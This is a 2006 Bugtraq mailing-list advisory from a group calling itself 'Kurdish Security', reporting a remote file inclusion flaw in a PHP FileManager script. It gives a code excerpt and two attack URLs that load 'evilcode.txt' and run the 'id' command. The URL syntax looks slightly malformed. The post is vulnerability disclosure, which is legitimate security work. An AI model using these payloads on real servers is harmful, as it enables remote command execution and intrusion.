Bugtraq mailing list archives

[Kurdish Security # 19 ] FileManager Remote Command Execution

From: botan () linuxmail org
Date: 1 Aug 2006 14:04:03 -0000

Kurdish Security

FileManager Remote Command Execution

Freedom For Ocalan

Contact : irc.gigachat.net #kurdhack & www.PatrioticHackers.com

Rish : High

Class : Remote

Script : FileManager

Site : http://www.knusperleicht.at


Code : 

$dwl_download_path = "downloads";
$dwl_include_path = "dwl/";
include($dwl_include_path."index.php");
?>

http://site.com/[path]/dwl_download_path=evilcode.txt?&cmd=id

http://site.com/[path]/dwl_include_path=evilcode.txt?&cmd=id

Current thread:

[Kurdish Security # 19 ] FileManager Remote Command Execution botan (Aug 01)